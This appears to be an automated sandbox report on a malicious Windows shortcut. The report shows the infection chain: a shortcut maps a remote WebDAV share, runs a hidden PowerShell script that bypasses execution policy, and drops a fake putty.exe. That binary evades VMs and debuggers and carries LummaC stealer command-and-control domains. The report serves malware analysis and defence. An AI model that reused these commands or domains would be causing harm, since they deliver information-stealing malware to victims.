Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: cscapi.dll	Jump to behavior

Source: d2W4YpqsKg.lnk

LNK file: ..\..\..\Windows\System32\cmd.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\user\Documents\adv.ps1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\user\Documents\adv.ps1			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\putty.exe

Code function: 13_2_003D02AC LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

13_2_003D02AC

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB10EB8139 push ebx; ret	11_2_00007FFB10EB813A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB11158C38 push E8FFFFFEh; iretd	11_2_00007FFB11158C3D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB11157F2B pushfd ; iretd	11_2_00007FFB11157F31
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB11213C7B push ds; retf	11_2_00007FFB11213C81
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB115158F8 push eax; iretd	11_2_00007FFB11515901
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB11506E70 push eax; ret	11_2_00007FFB11506E71
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB116727FC pushad ; ret	11_2_00007FFB116727FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB11678D6A push FFFFFFCFh; ret	11_2_00007FFB11678D6C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB118D8557 push ebp; iretd	11_2_00007FFB118D8558
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_003C1815 push ecx; ret	13_2_003C1828
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0033FA97 push 2B000001h; iretd	13_2_0033FA9C
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_003BC5E4 push ecx; ret	13_2_003BC5F7
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028AC285 push eax; mov dword ptr [esp], 76777879h	13_2_028AC293
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028AF015 push eax; mov dword ptr [esp], 1211104Fh	13_2_028AF016
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028B2638 push ecx; retf	13_2_028B2635
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028B2631 push ecx; retf	13_2_028B2635
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028B366D push esi; iretd	13_2_028B368C
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028A54FD pushfd ; iretd	13_2_028A5500
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028A1ABB push es; mov dword ptr [esp], edi	13_2_028A1AC5
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028B2982 pushad ; iretd	13_2_028B2983

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\putty.exe

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\putty.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6430			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3260			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\putty.exe

API coverage: 7.1 %

Source: C:\Windows\System32\net.exe TID: 8084	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792	Thread sleep time: -15679732462653109s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe TID: 7456	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe TID: 7500	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\putty.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\putty.exe

Code function: 13_2_00323B60 FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,

13_2_00323B60

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 11_2_00007FFB10EB2BBA GetSystemInfo,

11_2_00007FFB10EB2BBA

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: net.exe, 00000003.00000003.1351467045.000001D00EF23000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1521291382.000001D00EF23000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1521291382.000001D00EEB8000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 0000000D.00000002.1999856506.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 0000000D.00000002.1999856506.0000000000B69000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1989170343.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: net.exe, 00000003.00000002.1521291382.000001D00EEB8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: powershell.exe, 0000000B.00000002.1777920768.000001B9261B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\putty.exe

API call chain: ExitProcess graph end node

graph_13-36224

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\putty.exe

Code function: 13_2_003B9155 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

13_2_003B9155

Source: C:\Users\user\AppData\Local\Temp\putty.exe

13_2_003D02AC

Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0287110B mov eax, dword ptr fs:[00000030h]	13_2_0287110B
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_02870B4B mov edx, dword ptr fs:[00000030h]	13_2_02870B4B
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0287175B mov eax, dword ptr fs:[00000030h]	13_2_0287175B
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0287175A mov eax, dword ptr fs:[00000030h]	13_2_0287175A
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028714BB mov eax, dword ptr fs:[00000030h]	13_2_028714BB

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_003B9155 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		13_2_003B9155
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_003BF493 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		13_2_003BF493

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\user\Documents\adv.ps1

LummaC encrypted strings found

Source: putty.exe	String found in binary or memory: immureprech.biz
Source: putty.exe	String found in binary or memory: deafeninggeh.biz
Source: putty.exe	String found in binary or memory: debonairnukk.xyz
Source: putty.exe	String found in binary or memory: effecterectz.xyz
Source: putty.exe	String found in binary or memory: diffuculttan.xyz

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net use Z: \\todmeng.com@SSL\webdav\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\user\Documents\adv.ps1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\putty.exe "C:\Users\user\AppData\Local\Temp\putty.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use Z: /delete	Jump to behavior

